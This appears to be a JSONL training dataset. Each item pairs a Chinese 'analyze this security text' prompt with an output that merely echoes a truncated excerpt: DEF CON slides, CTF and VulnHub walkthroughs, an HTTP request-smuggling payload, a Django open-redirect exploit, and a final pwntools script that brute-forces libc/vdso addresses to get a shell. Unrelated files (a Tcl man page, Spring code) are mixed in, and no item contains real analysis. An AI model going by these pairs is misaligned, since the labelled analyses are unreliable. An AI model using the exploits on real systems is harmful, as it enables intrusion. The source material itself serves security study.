{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMQ Jumping . . . . Or, move to the front of the queue, pass go and collect 200 Martyn Ruks DEFCON 15 2007-08-03 2 One Year Ago  Last year I talked about IBM Networking attacks and said I was going to continue with my research.  But like any penetration tester I had other client work to do and that led to me looking at Websphere MQ.  It was so interesting I decided to do some more research and hence the reason Im here again.  It wasnt a conscious decision to look at IBM technology, it should be seen as an indication of the level of adoption of IBM technology in the marketplace. 3 Introduction 4 Who am I ?  My name is Martyn Ruks and I am a Security Consultant with MWR InfoSecurity in the UK.  I have approached this subject from the perspective of a penetration tester and then as a security researcher. I do not have a formal background in IBM computing.  I chose the subject of the presentation based on a number of interesting client engagements. 5 Intended Audience This talk is aimed at the following people:  Security Managers  Penetration Testers  Application Developers There are no pre-requisites for the contents of this presentation. 6 What will I talk about  Websphere MQ is a Middleware application for Messaging  MQ is a huge topic so I will focus on a number of specific areas today  I will talk about a TCP/IP environment  All the research has been conducted against Windows and UNIX platforms 7 Why study Websphere MQ?  The systems that communicate using it are usually business critical.  Tools for testing the software are not currently in the public domain.  The lack of security testing knowledge means that users of the software are potentially exposed to risk.  If you own the Middleware you usually own the business process. 8 Technical Background 9 MQ Series  A brief history  In 1993 IBM bought IP rights to ezBridge from SSI Systems  IBM produced a Mainframe version and SSI for other platforms  In 1994/5 IBM produced versions for AIX, OS/2 and AS/400  MQSeries wa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Unknown - Prison Cell Category: Web ## Description > You dont manage to disarm the guard, he is quicker than you are. He knocks you out, and when you wake up youre inside a prison cell, but it doesnt seem like youre on a boat anymore, you must be inside the headquarters on the secret island! The cell is claustrophobic, with rusty iron bars and a bed of concrete. > > Challenge: web-quotedb (web) > > In this challenge, you have to find the hidden flag. Good luck! ## Solution We get a simple website: ```console (user@kali)-[/media/sf_CTFs/google/14_Unknown_-_Prison_Cell] $ curl https://quotedb-web.2021.ctfcompetition.com/ <html> <head> <title>Quote DB</title> <link rel=\"stylesheet\" href=\"style.css\"> <script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js\" integrity=\"sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4\" crossorigin=\"anonymous\"></script> </head> <body> <h1>Welcome to the amazing Quote DB</h1> <div> <p>Here's the quote of the day for you: </p> <p class='quote'> \"It doesn't help to fight crime to put people in prison who are innocent.\" - Stephen Breyer </p> <p> If you'd like to return to this quote, just <a href=\"?id=7\">click here</a>. </p> </div> </body> </html> ``` As the website suggests, it's possible to access a specific quote directly: ```console (user@kali)-[/media/sf_CTFs/google/14_Unknown_-_Prison_Cell] $ curl https://quotedb-web.2021.ctfcompetition.com/?id=7 <html> <head> <title>Quote DB</title> <link rel=\"stylesheet\" href=\"style.css\"> <script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js\" integrity=\"sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4\" crossorigin=\"anonymous\"></script> </head> <body> <h1>Welcome to the amazing Quote DB</h1> <div> <p>Here's the quote of the day for you: </p> <p class='quote'> \"It doesn't help to fight crime to put people in prison who are innocent.\" - Stephen Breyer </p> <p> If you'd like to return to thi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAir Traffic Control: Insecurity and ADS-B Righter Kunkel, CISSP, CISA Security Researcher defcon 17 defcon 17 Righter Kunkel 2 Agenda Who am I? ATC Background DOS on a Tower State of Airline Security Where are we going? ADS-B defcon 17 Righter Kunkel 3 Who am I? Security Field for >12 years Worked with secure operating systems: B1, B2 Firewalls, proxies Trainer CISSP, CISA Ham Radio Private Pilot defcon 17 Righter Kunkel 4 First Is flying safe? YES Are planes going to fall out of the sky after this talk? NO Is flying safe after this talk? YES Is some of this talk illegal? YES Disclaimer: Dont do this! defcon 17 Righter Kunkel 5 Pilots? Is any one a pilot? defcon 17 Righter Kunkel 6 Our Focus We are not going to focus on: Airport physical security Cockpit door security X-Ray security Our focus: Computers used by ATC How airplanes report their position to ATC NexGen ATC defcon 17 Righter Kunkel 7 Why? ATC is busy moving planes through the air ATC not focused on network security of equipment being used Who would want to hack a radar scope? defcon 17 Righter Kunkel 8 Some ATC Background ATC VOR Transponders Flight Plans defcon 17 Righter Kunkel 9 ATC What is ATC? Source: GAO/T GAO/T GAO/T GAO/T----AIMD AIMD AIMD AIMD----00 00 00 00----330 FAA Computer Security 330 FAA Computer Security 330 FAA Computer Security 330 FAA Computer Security defcon 17 Righter Kunkel 10 VOR What are VORs? VHF Omni-directional Radio Range Source: Wikipedia defcon 17 Righter Kunkel 11 Airplane Transponder Source: Wikipedia defcon 17 Righter Kunkel 12 Mode-S Transponders Primary Surveillance Radar (PSR) Paint the skin Secondary Surveillance Radar (SSR) Asks planes transponder to send out a signal and data, time based Get unconfirmed ALT from plane Source: Wikipedia defcon 17 Righter Kunkel 13 How do Flight Plans Work? Pilot submits a requested route Goes into a central computer Real flight plan gets printed out at ATC Source: Wikipedia defcon 17 Righter Kunkel 14 Some interesting attacks in the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnd Point of Sale Systems HACKING HOTEL KEYS Security Consultant TWITTER, LinkedIN @westonhecker Rapid7 www.rapid7.com Senior Security Engineer/Senior Pentester/ Security Researcher. About 11 years pen-testing, Security Research, Speaker at Defcon 22, 23 and 24 Las Vegas, HOPE 11, TakedownCON 2016,B-sides Boston, Blackhat 2016, Enterprise Connect 2016, ISC2, SC Congress Toronto. 12 years programming and Reverse Engineering. Side projects Department of Home Land Security. Attacking 911 centers / Malware Analysis Ransomware. Hacking ATMs, Cars, Point of Sale Systems, Hotel Key Systems - Property Management Software. A Little Bit About Myself Explain magstrip readers Magspoofer. Difference from RFID Explain Modification to device. Hotel back ends explained, POS systems Explained Process of key checkout check in. Different parts of hotels. Attacks on Privileged Keys. Maids, Service , Fireman Encryption is just encoded. What Is This Talk About? What lead to research on POS from hotel keys. How Do POS systems use magstripe readers. Trigger events and when the Reader listening and what is it listening for. Management cards on POS/card readers on the screen. How is a magstripe reader Used as a HID keyboard?. Injecting 102-US and proprietary keyboard layouts into binary data. Cash tend/Check tend attack. Attacking OS SQL injection CMD Drive by attack Restaurant attacks/other mag readers/Rewards programs and players cards on slot machines What Is This Talk About?  What is Magspoofer Thanks to Samy Kamkar for his work. How does a Magstipe Reader work  Explanation of Magspoofer+ and EM fields and how they interact w ith Heads on magnetic head read er this is not RFID Cards!!!. How magspoofer works what is SMT How To Handle Over Heating 100s of Cards = Heat Explanation of PMS Explanation of proprietary card readers and security behind hotel keys. Collecting information from keys and reissued keys. Interactions with different readers your door vs elevator external access and pool", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CYBERSPLOIT: 1 > https://download.vulnhub.com/cybersploit/cybersploit.ova 靶场IP`192.168.2.17` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p1-65535 -sV 192.168.2.17 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 10:33 EDT Nmap scan report for 192.168.2.17 Host is up (0.000078s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) MAC Address: 08:00:27:48:83:0B (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds ``` 爆破web目录 ``` (rootkali)-[/tmp] # dirb http://192.168.2.17/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Sep 8 10:35:55 2022 URL_BASE: http://192.168.2.17/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.2.17/ ---- + http://192.168.2.17/cgi-bin/ (CODE:403|SIZE:288) + http://192.168.2.17/hacker (CODE:200|SIZE:3757743) + http://192.168.2.17/index (CODE:200|SIZE:2333) + http://192.168.2.17/index.html (CODE:200|SIZE:2333) + http://192.168.2.17/robots (CODE:200|SIZE:79) + http://192.168.2.17/robots.txt (CODE:200|SIZE:79) + http://192.168.2.17/server-status (CODE:403|SIZE:293) ----------------- END_TIME: Thu Sep 8 10:35:57 2022 DOWNLOADED: 4612 - FOUND: 7 ``` 访问80端口 ![QQ录屏20220908223456](../../.gitbook/assets/QQ录屏20220908223456.gif) 查看页面源代码找到一个用户名`itsskv` ![image-20220908224347156](../../.gitbook/assets/image-20220908224347156.png) 访问`/hacker` ![QQ录屏20220908223855](../../.gitbook/assets/QQ录屏20220908223855.gif) 访问`/robots.txt ` ``` (rootkali)-[/tmp] # curl http://192.168.2.17/robots.txt R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 (rootkali)-[/tmp] # echo 'R29vZCBXb3JrICEKRmxhZzE6IG", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrypto: State of the Law DEF CON 24 Nate Cardozo, Senior Staff Attorney, EFF 783A 8CC4 166D 1768 4E8E DAFD 2D76 4786 4AE6 3181 End to end encryption is legal. Period. Jennifer Granick, Black Hat 2016 Questions? The Net interprets censorship as damage and routes around it. John Gilmore, ~1993 The First Crypto Wars The First Crypto Wars If all you have is a hammer If all you have is a J.D.  And the Internet was a safer place for it! Thank your lucky PKIs for ECCN 5D002!!  We thought we had solved the field  But thanks to Comey  More work remains The Next Crypto Wars What could possibly go wrong? What if we re-named back doors? The slide you are about to see is false. Legislation  Many countries around the world are considering legislation that would either  mandate backdoors,  mandate access to plaintext or  endanger encryption. UK IPB and the Death of e2e AUS DSGL and the Death of all crypto ! + \" = # $$$ Thanks Obama  October 2015: We will not for nowcall for legislation requiring companies to decode messages for law enforcement. Thanks Obama  November 2015: Identify laws that need to be changed to deal with going dark. Thanks Obama  March 2016: My conclusion so far is that you cannot take an absolutist view on thisit's fetishizing our phones above every other value. And that can't be the right answer. All Writs Act Litigation  Apple v. FBI  This is the San Bernardino iPhone case  Also, a case in EDNY Other Litigation  Wiretap Act litigation may be coming  New York Times report re: WhatsApp  There may be FISA Court orders  EFF is in the middle of a FOIA case to get access to them Burr-Feinstein Bill  Would require providers to decrypt on demand  Criminal and civil penalties  Applies to comms, storage, and licensing  This includes app stores and open source  Not just e2e and FDE  This would outlaw computers as we know them 2016  What are we looking at?  Key escrow mandate  I dont think this is actually going to happen.  Burr-Feinstein  This definitely wont happen (in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PAM --- ## 关于PAM PAM 基础知识见 [认证](../笔记/认证.md#pam) **安装 PAM** CentOSFedoraEulerOS 系统默认安装了 PAM 并默认启动 ```bash apt-get install libpam-cracklib ``` **判断程序是否使用了 PAM** ``` ldd /usr/bin/passwd | grep libpam ``` **PAM 身份验证配置文件** `/etc/pam.d/` 目录包含应用程序的 PAM 配置文件例如login 程序将其程序/服务名称定义为 login与之对应的 PAM 配置文件为 `/etc/pam.d/login` **PAM 配置文件语法格式** 每个PAM配置文件都包含一组指令用于定义模块以及控制标志和参数每条指令都有一个简单的语法用于标识模块的目的接口和模块的配置设置语法格式如下 ``` module_interface control_flag module_name module_arguments ``` **PAM 模块接口(模块管理组)** PAM为认证任务提供四种类型可用的模块接口它们分别提供不同的认证服务 * auth - 认证模块接口如验证用户身份检查密码是否可以通过并设置用户凭据 * account - 账户模块接口检查指定账户是否满足当前验证条件如用户是否有权访问所请求的服务检查账户是否到期 * password - 密码模块接口用于更改用户密码以及强制使用强密码配置 * session - 会话模块接口用于管理和配置用户会话会话在用户成功认证之后启动生效 **PAM 控制标志** 所有的 PAM 模块被调用时都会返回成功或者失败的结果每个 PAM 模块中由多个对应的控制标志决定结果是否通过或失败每一个控制标志对应一个处理结果PAM 库将这些通过/失败的结果整合为一个整体的通过/失败结果然后将结果返回给应用程序模块可以按特定的顺序堆叠控制标志是实现用户在对某一个特定的应用程序或服务身份验证的具体实现细节该控制标志是 PAM 配置文件中的第二个字段PAM 控制标志如下 * required - 模块结果必须成功才能继续认证如果在此处测试失败则继续测试引用在该模块接口的下一个模块直到所有的模块测试完成才将结果通知给用户 * requisite - 模块结果必须成功才能继续认证如果在此处测试失败则会立即将失败结果通知给用户 * sufficient - 模块结果如果测试失败将被忽略如果 sufficient 模块测试成功并且之前的 required 模块没有发生故障PAM 会向应用程序返回通过的结果不会再调用堆栈中其他模块 * optional - 该模块返回的通过 / 失败结果被忽略当没有其他模块被引用时标记为 optional 模块并且成功验证时该模块才是必须的该模块被调用来执行一些操作并不影响模块堆栈的结果 * include - 与其他控制标志不同include 与模块结果的处理方式无关该标志用于直接引用其他 PAM 模块的配置参数 --- ## PAM模式使用说明 ### pam_access.so pam_access.so 模块主要的功能和作用是根据主机名包括普通主机名或者 FQDNIP 地址和用户实现全面的访问控制pam_access.so 模块的具体工作行为根据配置文件 `/etc/security/access.conf` 来决定该配置文件的主体包含了三个字段权限用户和访问发起方格式上是一个用 \"\" 隔开的表 * 第一个字段权限permission使用 \"+\" 表示授予权限用 \"-\" 表示禁止权限 * 第二个字段用户user定义了用户组以及用 \"@\" 表示的在不同主机上的同名用户和同一主机上不同名用户 * 第三个字段访问发起方origins定义了发起访问的主机名称域名称终端名称 而且 `/etc/security/access.conf` 文件提供了很多范例供修改时参考并且都给出了具体的说明例如 ```bash #禁止非root用户通过tty1访问相关服务 #-:ALL EXCEPT root:tty1 #禁止除了wheelshutdown以及sync之外的所有用户访问相关服务 #-:ALL EXCEPT wheel shutdown sync:LOCAL #禁止wheel用户通过.win.tue.nl之外的其它它终端访问相关服务 #-:wheel:ALL EXCEPT LOCAL .win.tue.nl # 禁止下面的用户从任何主机登录其它用户可以从任意地方访问相关服务 #-:wsbscaro wsbsecr wsbspac wsbsym wscosor wstaiwde:AL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhos&this&guy&  10&years&on&the&defensive&side&  File&analysis&&&RE&  Recently&doing&research&using&machine& learning& Level&Se?ng&  ROP&  Technique&to&bypass&nonFexecutable&memory&  Bounce&around&in&memory&execuIng&small& gadgets&that&typically&end&with&a&return& instrucIon&  PIN&  Pin&is&a&dynamic&binary&instrumentaIon& framework&from&Intel&  Does&not&require&recompiling&of&source&&&&&&&&&&&& code&and&can&support&instrumenIng&&&&&&&&&& programs&that&dynamically&generate&code& Basic&Idea&  Control&flow&integrity&  Start&with&coarse&grain&controls&  We&know&valid&targets&for&calls&and&rets&  FuncIons&  InstrucIons&aQer&a&call&instrucIon&  A&whitelist&containing&these&addresses&  Store&the&offset&to&these&locaIons&  If&an&indirect&call&or&a&ret&goes&to&a&&&&&&&&&&&&&&&&&&&&&&&& different&locaIon,&then&ROP& How&Do&We&Get&Those?&  BranchTargetDetector&pintool&  When&DLL&is&loaded,&the&exported&funcIons& are&analyzed&  All&calls&and&returns&are&instrumented&&&&&&&&&&&&& as&well&  Offsets&are&stored&and&dumped&to&text&&&&&&&&&&& file&when&program&exits& BranchTargetDetector&  Pros&  We&get&real,&actual&used&values&  Cons&  Not&the&fastest&thing&  Only&get&values&from&funcIons&pin&can&&&&&&&&&&& detect&and&what&it&actually&executes&  If&DLL&isnt&loaded,&you&dont&get&data&&&&&&&&&&&&&&&&&&& for&it&  Must&run&mulIple&Imes& How&Else&Can&We&Get&Those?&  pyew&  Much&be[er&at&detecIng&funcIons&  Can&extract&the&flow&graphs&  Can&bulk&run&all&DLLs& Have&Data,&Now&What?&  Store&offsets&in&file&per&md5&hash&of&dll&  Allows&for&handling&of&different&versions&of&the& same&dll& ROPDetector&  When&a&DLL&is&loaded,&load&the&white&list&for& that&DLL&  Instrument&all&indirect&calls&and&RETs&and&alert& when&target&is&not&on&the&white&list& Example&1&  Adobe&Reader&9.3&on&Windows&XP&  32dbd816b0b08878bd332eee299bbec4&  CVEF2010F2883&  StackFbased&buffer&overflow&in&CoolType.dll& DetecIon!& C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\icucnv36.dll 0x4a80cb3f: ret Target: 0x4a82a714 (0x2a714) & Yay?&  We&d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Django < 2.0.8 Open redirect possibility in CommonMiddleware (CVE-2018-14574) [中文版本(Chinese version)](README.zh-cn.md) If the `django.middleware.common.CommonMiddleware` and the `APPEND_SLASH` setting are both enabled, and if the project has a URL pattern that accepts any path ending in a slash, then a request to a maliciously crafted URL of that site could lead to a redirect to another site, enabling phishing and other attacks. ## Vulnerability environment Start the environment with Django 2.0.7: ``` docker compose build docker compose up -d ``` ## Exploit Now visit `http://your-ip:8000//www.example.com`, you will be redirected to `//www.example.com/` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Remote Metamorphic Engine Detecting, Evading, Attacking the AI and Reverse Engineering Amro Abdelgawad / DEFCON 24 line46_1: mov ecx, [esp] nop nop mov dl, 0xe9 test edx, edx mov byte [ecx], dl xor eax, 0 mov edx, 0x00000067 mov dword [ecx+1], edx ret line95: pushad pushf call line95_1 db 7 db 3 dd 838225172 db 2 dd 4211932376 db 4 dd 2520091426 db 3 dd 946381070 db 2 dd 3318121790 db 2 dd 1375432265 db 1 dd -1 mov ebx, 92 add eax, ebx mov ebx, eax sub dword [eax], 0xe82c334d add eax, 4 add dword [eax], 0xa1723594 add eax, 4 xor dword [eax], 0xb1c21343 add eax, 4 sub dword [eax], 0x111111ee add eax, 4 add dword [eax], 0xaaccee22 add eax, 4 jmp ebx line95_2: popf popad nop jmp long line96 line95_1: mov eax, [esp] nop nop xor eax, eax xor ecx, ecx xor edx, edx mov cl, 0xe9 mov byte [eax], cl xor edx, 0 mov ecx, 0x00000057 mov dword [eax+1], ecx ret The Remote Metamorphic Engine  Security as undefined expression  Flux binary mutation  Resisting Reverse Engineering  Evading AI machine learning  Artificial Immunity 2 line46_1: mov ecx, [esp] nop nop mov dl, 0xe9 test edx, edx mov byte [ecx], dl xor eax, 0 mov edx, 0x00000067 mov dword [ecx+1], edx ret line95: pushad pushf call line95_1 db 7 db 3 dd 838225172 db 2 dd 4211932376 db 4 dd 2520091426 db 3 dd 946381070 db 2 dd 3318121790 db 2 dd 1375432265 db 1 dd -1 mov ebx, 92 add eax, ebx mov ebx, eax sub dword [eax], 0xe82c334d add eax, 4 add dword [eax], 0xa1723594 add eax, 4 xor dword [eax], 0xb1c21343 add eax, 4 sub dword [eax], 0x111111ee add eax, 4 add dword [eax], 0xaaccee22 add eax, 4 jmp ebx line95_2: popf popad nop jmp long line96 line95_1: mov eax, [esp] nop nop xor eax, eax xor ecx, ecx xor edx, edx mov cl, 0xe9 mov byte [eax], cl xor edx, 0 mov ecx, 0x00000057 mov dword [eax+1], ecx ret Security Patterns {Division by Infinity | Division by Zero } Isolation Randomization 1 / dword 1 / 4294967295 1 * 0 = 0 1 /  = 0 undefined 1 / 0 = undefined Reducing probabilities Undefined Probabilities 3 line46_1: mov ecx,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HTTP_request_smuggling --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **相关文章** - [HTTP Desync Attacks: Request Smuggling Reborn | Blog - PortSwigger](https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn) - [HTTP Desync Attacks: Smashing into the Cell Next Door ](https://xz.aliyun.com/t/5978) - 上面的翻译版 - [What is HTTP request smuggling? Tutorial & Examples](https://portswigger.net/web-security/request-smuggling) - [HTTP request smuggling](https://saucer-man.com/information_security/368.html) - [一篇文章带你读懂 HTTP Smuggling 攻击](https://blog.zeddyu.info/2019/12/05/HTTP-Smuggling/) - [协议层的攻击HTTP请求走私](https://paper.seebug.org/1048/) - [Breaking the chains on HTTP Request Smuggler](https://portswigger.net/research/breaking-the-chains-on-http-request-smuggler) - [从一道题深入HTTP协议与HTTP请求走私](https://xz.aliyun.com/t/6631) - [流量夹带(HTTP Request Smuggling) 检测方案的实现](https://blog.riskivy.com/%e6%b5%81%e9%87%8f%e5%a4%b9%e5%b8%a6http-request-smuggling-%e6%a3%80%e6%b5%8b%e6%96%b9%e6%a1%88%e7%9a%84%e5%ae%9e%e7%8e%b0/) **靶场** - [ZeddYu/HTTP-Smuggling-Lab](https://github.com/ZeddYu/HTTP-Smuggling-Lab) **burp扩展** - [PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler) **相关工具** - [defparam/smuggler](https://github.com/defparam/smuggler) - Python 3 编写的 HTTP 请求走私检测工具 --- # 漏洞产生的原因 HTTP Request Smuggling 最初是由 WatchFire1 于 2005 年记录下来的由于难以利用和危害性无法控制该问题一直处于被忽略的状态直到 2019 年的 BlackHat USA 上PortSwigger 的 James Kettle 在他的议题HTTP Desync Attacks: Smashing into the Cell Next Door 中提出了一套较为完善的利用流程这个漏洞才被人熟知 上面我们说到了 HTTP 协议的基本原理其中一个 HTTP 请求中可以有多种方式来指定消息的长度比如Content-LengthTransfer-Encoding 但是当一个请求中同时出现了 2 种方法就会发生一些问题HTTP 规范 (RFC2616) 中定义如果接收的消息同时包含传输编码头字段 (Transfer-Encoding) 和内容长度头 (Content-Length) 字段则必须忽略后者然而后端服务器有自己的想法它会同时处理 --- # 几种走私请求利用方法 **CL 不为 0 的 GET 请求** 假设前端代理服务器允许 GET 请求携带请求体而后端服务器不允许 GET 请求携带请求体它会直接忽略掉 GET 请求中的 Content-Length 头不进行处理这就有可能导致请求走私 ``` GET / HTTP/1.1\\r\\n Host: example.com\\r\\n Content-Length: 44\\r\\n GET / secret HT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1997 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" RCS: @(#) $Id: resource.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" opti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBugged&Files& Is#Your#Document#Telling#on#You?# Daniel#Crowley,#Damon#Smith#  Damon&Smith& Who&are&we?&  Daniel&Crowley& Files&that&trigger&outbound&traffic&when&parsed& & &Without&being&an&executable&format& &Regardless&of&format&complexity& &&&&&&Without&the&use&of&exploits& & &and&the&implications&of&all&that& What&is&this&talk&about?&  Privacy&  DRM&  DLP&  DeFanonymization&  Security&  NTLM&credential&capture/relay&  CSRF&  Its&a&feature,&not&a&bug& Why&is&this&important?& & Demonstration&  RTF&  WMV&  Office&formats&  .docx&  .pptx&  .xlsx&  PLS&playlists&  Shortcut&(.lnk)&files&  Desktop.ini&files&  HTML& What&formats&are&already&known&to& allow&this?&  HTML&in&IE&  Linked&images&in&emails&opened&in&Outlook!& Other&NTLM&trigger&silliness&  Document&formats&  Media&formats&  Meeting/scheduling&related&formats& & What&did&our&work&focus&on?&  Remote&image&  No&warning,&no&NTLM&  App.media.openPlayer()&  Warning,&NTLM&possible&  getURL()&  Warning,&NTLM&possible& PDF&  Linked&document&on&UNC&share&  Warning&(ignored),&NTLM&possible& RTF&  Remote&XML&stylesheets&  Javascript& SVG&(Scalable&Vector&Graphics)&  All&these&formats&support&remote&media&  Even&UNC&paths& M3U&/&PLS&/&ASX&  ID3&tag&  LINK&frame&  APIC&frame&  Not&supported&on& any&major&player&we& tested&!& MP3&  URLANDEXIT&  Launches&default&browser&with&specified&URL&  DRM&functionality&abuse&  Subtitles&  Can&include&arbitrary&HTML& ASF&(WMA/WMV/ASF)&  HTTP&tracker&URLs&in&announceFlist&  As&many&as&you&want&  URL&seeds&allowed&in&urlFlist&  Clients&can&implement&any&URL&handler&  Must&support&one&or&both&of&HTTP&&&FTP&  Not&universally&supported& TORRENT&  Free/Busy&URL&  No&warning,&NTLM&possible&  Requires&specific&actions&by&recipient& VCF&(vCard&format)&  VALARM&  ATTACH&parameter&is&a&URL&  AUDIO&and&PROCEDURE&alarm&types& &  ICS&is&the&iCalendar&format&  Not&even&Calendar.app&will&let&you&accept& PROCEDURE&!& ICS&(iCalendar&format)&  Email&  Open&file&share&  Watering&hole&  P2P&distribution&  Honeypot& ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/* * Copyright 2015-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the \"License\"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an \"AS IS\" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package example.springdata.rest.headers; import org.springframework.data.repository.CrudRepository; import org.springframework.web.bind.annotation.CrossOrigin; /** * Spring Data repository interface to manage {@link Customer} instances. * * @author Oliver Gierke * @author Mark Paluch * @soundtrack The Intersphere - Out of phase (Live at Alte Feuerwache Mannheim) */ @CrossOrigin(origins = { \"http://localhost\", \"http://localhost:1234\" }) public interface CustomerRepository extends CrudRepository<Customer, Long> {}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(psx86_pie&x86_srop入门题) 文件链接https://pan.baidu.com/s/17pIc0RrfLRH9arMbJmJGjA 提取码4olb 环境搭建 1.查看文件信息及保护机制 got表只读NXPIE都开了 2.ubuntu运行ida*32远程调试文件打开ida32对程序进行分析 函数窗口中未发现可以函数打开main函数发现只有一个read函数并且可以栈溢出 3.远程调试断点于main函数第一行运行 4. 看到程序运行后ida中的模块窗口出现这些则有 一.根据pie的特性最后12位不变多次加载程序后发现libc的基址前三位也是不变也 就是只需爆破8位即可 二.可以通过上述方法进行爆破vdso地址与上面不同的是vdso的地址第三位是可变的 有时是E有时是F然后进行srop 5. 这里有个坑如果是新手就是ida上模块中的libc文件名并不是题目中给出的libc文 件而是以实际程序调用的libc文件为准 可以看到题目给出的libc文件和程序实际加载的libc文件是不一样的(由于是用本地系统搭建 pwn题环境)地址也理所当然的不一样所以本地搭建环境一定要看清楚程序到底用 哪个libc文件 6. ①爆破libc的exp 亦可直接覆盖返回地址的后3字节->6位16进制数来爆破one_gadget 1 from pwn import * 2 3 context.binary = './233' 4 5 6 libc_start = 0xf7d56000 #guess_start_address 7 #one_gadget_add = libc_start + 0x3af1c 8 system_add = libc_start + 0x3a940 9 shell = libc_start + 0x15902b 10 11 while True: 12 try: 13 link = remote(\"192.168.93.137\",\"6666\") 14 #payload = 'A' * 0x16 + p32(one_gadget_add) 15 payload = 'A' * 0x16 16 payload += p32(system_add) 17 payload +=p32(0) 18 payload += p32(shell) 19 link.send(payload) 20 link.recv(timneout=1) 21 except EOFError: 22 link.close() 23 continue 24 link.interactive() 执行爆破脚本getshell 拿flag ②爆破vdso进行SROPexp 1 from pwn import * 2 3 context.binary = './233' 4 5 global link 6 7 shellcode = asm(shellcraft.i386.linux.sh(),arch='i386') 8 vdso_add = 0xf7f17000 9 